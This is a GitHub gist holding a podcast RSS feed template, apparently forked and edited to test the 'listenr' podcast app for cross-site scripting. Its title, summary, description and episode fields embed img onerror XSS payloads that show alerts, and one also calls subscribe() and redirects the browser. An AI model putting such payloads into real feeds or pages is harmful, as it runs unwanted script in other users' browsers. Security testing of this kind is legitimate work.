Skip to content

Instantly share code, notes, and snippets.

@vincens2005
Forked from jonhoo/podcast.xml
Last active April 21, 2021 23:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vincens2005/fe1769d764fd1447a450adf23a103fcb to your computer and use it in GitHub Desktop.
Save vincens2005/fe1769d764fd1447a450adf23a103fcb to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
>
<channel>
<atom:link href="{{ site.url }}{{ page.url }}" rel="self" type="application/rss+xml" />
<link>{{ site.url }}</link>
<title>Don't click this show <![CDATA[
<img src=x onerror="alert('title xss!!!')">
]]></title>
<itunes:subtitle>It was made to test listenr.
if you click on it, bad things will happen
BAD BAD BAD BAD THINGS!!!!!!!!
</itunes:subtitle>
<itunes:summary>
<![CDATA[
<p>
It was made to test listenr.
if you click on it, bad things will happen
BAD BAD BAD BAD THINGS!!!!!!!!
<img src=x onerror="alert('this is another xss test. please snad by')">
<img src=x_poopoo onerror="subscribe(); alert('you are a dumb dumb'); alert('you can never unsubscribe from this11!!'); window.location='https://youtu.be/Lrj2Hq7xqQ8';">
</p>]]></itunes:summary>
<description>
<![CDATA[
<p>
It was made to test listenr.
if you click on it, bad things will happen
BAD BAD BAD BAD THINGS!!!!!!!!
<img src=x_poopoo onerror="subscribe(); alert('you are a dumb dumb'); alert('you can never unsubscribe from this11!!'); window.location='https://youtu.be/Lrj2Hq7xqQ8';">
<img src=x onerror="alert('this is another xss test. please snad by')">
</p>
]]>
</description>
<itunes:category text="Technology" />
<itunes:keywords>{{ site.keywords }}</itunes:keywords>
<itunes:explicit>yes</itunes:explicit>
<image>
<link>{{ site.url }}</link>
<url>https://listenr.gq/icon-512.png</url>
<title>{{ site.title }}</title>
</image>
<itunes:image href="{{ site.url }}/images/artwork.png" />
<language>{{ site.lang }}</language>
<pubDate>{{ site.time | date_to_rfc822 }}</pubDate>
<lastBuildDate>{{ site.time | date_to_rfc822 }}</lastBuildDate>
<managingEditor><![CDATA[ {{ site.email }} ({{ site.author }}) ]]></managingEditor>
<webMaster>jon@thesquareplanet.com (Jon Gjengset)</webMaster>
<itunes:author><![CDATA[ {{ site.author }} ]]></itunes:author>
<!-- <googleplay:email>jon@tsp.io</googleplay:email> -->
<itunes:owner>
<itunes:name>CUKMEKERB</itunes:name>
<itunes:email>AAAAAAAAAAAAAAAAAa</itunes:email>
</itunes:owner>
<item>
<!-- <link>{{ site.url }}{{ post.url }}</link> -->
<itunes:explicit>yes</itunes:explicit>
<pubDate>{{ post.date | date_to_rfc822 }}</pubDate>
<guid isPermaLink="false">rustacean-station/{{ post.url }}</guid>
<title>explicit episode</title>
<!-- <googleplay:description><![CDATA[ {{ post.content | strip_html }}]]></googleplay:description> -->
<itunes:summary>short summart</itunes:summary>
<description>
<![CDATA[
<p>
xss test
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<img src=x onerror="alert('episode XSS')">
</p>
]]>
</description>
<content:encoded><![CDATA[ {{ post.content }} ]]></content:encoded>
<enclosure url="{{ post.file }}" length="{{ post.length }}" type="audio/mpeg"/>
<itunes:duration>{{ post.duration }}</itunes:duration>
</item>
<item>
<!-- <link>{{ site.url }}{{ post.url }}</link> -->
<itunes:explicit>no</itunes:explicit>
<pubDate>{{ post.date | date_to_rfc822 }}</pubDate>
<guid isPermaLink="false">rustacean-station/{{ post.url }}</guid>
<title>AAAAAAAAAAAAA</title>
<!-- <googleplay:description><![CDATA[ {{ post.content | strip_html }}]]></googleplay:description> -->
<itunes:summary>test test</itunes:summary>
<description><![CDATA[ {{ post.content | strip_html }} ]]></description>
<content:encoded><![CDATA[ {{ post.content }} ]]></content:encoded>
<enclosure url="{{ post.file }}" length="{{ post.length }}" type="audio/mpeg"/>
<itunes:duration>{{ post.duration }}</itunes:duration>
</item>
{% endfor %}
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment